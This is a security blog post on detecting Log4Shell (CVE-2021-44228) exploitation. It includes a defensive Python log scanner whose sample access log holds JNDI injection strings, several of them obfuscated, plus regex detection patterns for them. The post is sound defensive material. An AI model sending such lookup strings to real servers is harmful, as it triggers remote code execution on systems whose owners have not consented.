
Log4j Exploit Detection (CVE-2021-44228)
If you are reading this then I assume you have already heard about CVE-2021-44228, the Remote Code Execution (RCE) vulnerability in Apache Log4j, the Java logging library that much of the internet runs on its web servers. While many blogs and comments have posted methods to determine whether your web servers / websites are vulnerable, there is limited info on how to easily detect whether your web server has actually been exploited and infected. But first, a quick synopsis:
CVE-2021-44228 Apache Log4j RCE
- First, as most of Twitter and the security community are saying: this vulnerability is bad. Real bad. A lot of prominent websites run this logger.
- RCE = Remote Code Execution. The attacker can run whatever code (e.g. malware) they want on your web server by sending a web request to your website containing nothing more than a “magic” string (a JNDI lookup such as `${jndi:ldap://...}`) plus a link to the code they want to run. Anything the application logs (User-Agent header, URL parameters, form fields, other headers) is a delivery channel.
- Affects any Java application, not only web servers, that uses a vulnerable version of Log4j 2 (the most popular Java logging library). It is not a flaw in the Apache HTTP Server; the “Apache” in the name refers to the Apache Software Foundation project that maintains Log4j.
- Vulnerable versions: Log4j 2.0-beta9 through 2.14.1
Has anyone tried to exploit my web server?
Typical behavior to expect if your server is exploited by an attacker is the installation of a new webshell (website malware that gives admin access to the server via a hidden administrator interface). The Java process (Tomcat, JBoss, a standalone JVM, etc.), running as the web application's user, spawns curl or wget to pull down the webshell or other malware the attacker wants to install.
Luckily, there are a couple of ways to detect exploit attempts while monitoring the server and to uncover previous exploit attempts:
- Review web server and application logs for `jndi:ldap`, `jndi:rmi` or `jndi:dns`. These are the magic strings that cause the logger to go haywire and follow/execute the URL that follows them. Attackers obfuscate them with nested lookups such as `${${lower:j}ndi:...}` or `${${::-j}ndi:...}` and with URL-encoding, so search case-insensitively and decode before matching, or also match on the nested-lookup patterns themselves.
- Scan /var/log with YARA signatures matching some of these indicators
- Scan the web server for generic webshells
- If you have EDR on the web server, monitor for suspicious curl, wget, or related commands spawned by the Java process. The first code attackers run after exploitation typically has the system reach out to the command and control server using built-in utilities like these.
NOTE: If the server is exploited by automated scanners (good guys run these too), it’s possible to get an indicator of exploitation without follow-on malware or webshells. Some research scanners trigger the vulnerability and have the system send a single ping or DNS request to tell the researcher who was vulnerable. Treat a DNS-only callback as confirmation that the host is exploitable, not as proof that nobody else got there first.
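The log-review step above, worked as an added example (my code, not Infocyte's scanner): it URL-decodes each access-log line, collapses the `${lower:...}` and `${...:-x}` obfuscation wrappers, then matches the JNDI lookup and pulls out the protocol and callback host so you can pivot to firewall and DNS logs. The log lines are constructed for the demo and use documentation addresses; the protocol list is wider than the three the post names (it also covers the other JNDI providers an attacker can point a lookup at).

```python
"""Scan web-server access logs for Log4Shell (CVE-2021-44228) probe strings.

Added example for this post, not Infocyte's scanner code. The log lines are
constructed for the demo: client IPs and callback hosts are documentation /
test addresses (RFC 5737, .test), not real indicators of compromise.
"""
import re
import urllib.parse

# Constructed Apache combined-format access log. Line 1 is benign; lines 2-5
# carry a JNDI lookup in the User-Agent or the request line, plain or obfuscated.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Dec/2021:03:12:44 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.11 - - [11/Dec/2021:03:12:45 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.99:1389/a}"
203.0.113.12 - - [11/Dec/2021:03:12:46 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.99:1099/x} HTTP/1.1" 200 612 "-" "curl/7.68.0"
203.0.113.13 - - [11/Dec/2021:03:12:47 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fa%7D HTTP/1.1" 404 196 "-" "-"
203.0.113.14 - - [11/Dec/2021:03:12:48 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.99/b}"
"""

# An innermost ${...} lookup: its body contains no further braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# JNDI lookup after normalisation. ldap/rmi/dns are the ones the post names;
# ldaps/iiop/corba/nis/nds are the other JNDI providers attackers can use.
_JNDI = re.compile(r"\$\{\s*jndi:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)\b[^}]*\}", re.I)
# Protocol and callback host inside a JNDI lookup, for pivoting to egress logs.
_TARGET = re.compile(r"jndi:\s*(\w+)://([^/:}\s]+)", re.I)


def _resolve(m):
    """Collapse one Log4j obfuscation wrapper; leave real lookups untouched."""
    body = m.group(1)
    key, _, rest = body.partition(":")
    key = key.strip().lower()
    if key == "jndi":
        return m.group(0)              # the payload itself: keep for the signature
    if key == "lower":
        return rest.lower()            # ${lower:J} -> j
    if key == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${x:-y} default syntax; ${::-j} -> j
    return m.group(0)                  # e.g. ${env:HOSTNAME}: not a wrapper


def normalize(s, max_rounds=10):
    """URL-decode and resolve nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, urllib.parse.unquote(s))
        if resolved == s:
            break
        s = resolved
    return s


def find_jndi(line):
    """Return the normalised JNDI lookup found in a log line, or None."""
    m = _JNDI.search(normalize(line))
    return m.group(0) if m else None


def scan_log(text):
    """Return (line_no, client_ip, protocol, callback_host) for every probe."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        lookup = find_jndi(line)
        if not lookup:
            continue
        t = _TARGET.search(lookup)
        proto, host = (t.group(1).lower(), t.group(2)) if t else ("?", "?")
        hits.append((n, line.split(" ", 1)[0], proto, host))
    return hits


if __name__ == "__main__":
    for n, ip, proto, host in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ip} sent a jndi:{proto} lookup pointing at {host}")
```

Run it against real logs with `scan_log(open(path, errors="replace").read())`, and remember that the same strings land in application logs (Tomcat's catalina.out, the app's own Log4j output) and in rotated `.gz` files, not only in the Apache access log. The callback host is what to look for in firewall and DNS logs: an outbound LDAP or RMI connection to it from the Java process means the lookup actually fired, not merely that the string was logged.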
Infocyte log4j Scanner Extension
Infocyte has published a log4j scanner that conducts the tasks above. Run it on Linux servers to identify evidence of exploitation or compromise. Note: This scanner is under continuing development, so check back daily this week for any updates as the community learns more.
Don’t hesitate to reach out to the Infocyte team for help.
Good Hunting!
This is a Security Bloggers Network syndicated blog from Blog – Infocyte, authored by Chris Gerritz. Read the original post at: https://www.infocyte.com/blog/2021/12/11/log4j-exploit-detection-cve-2021-44228/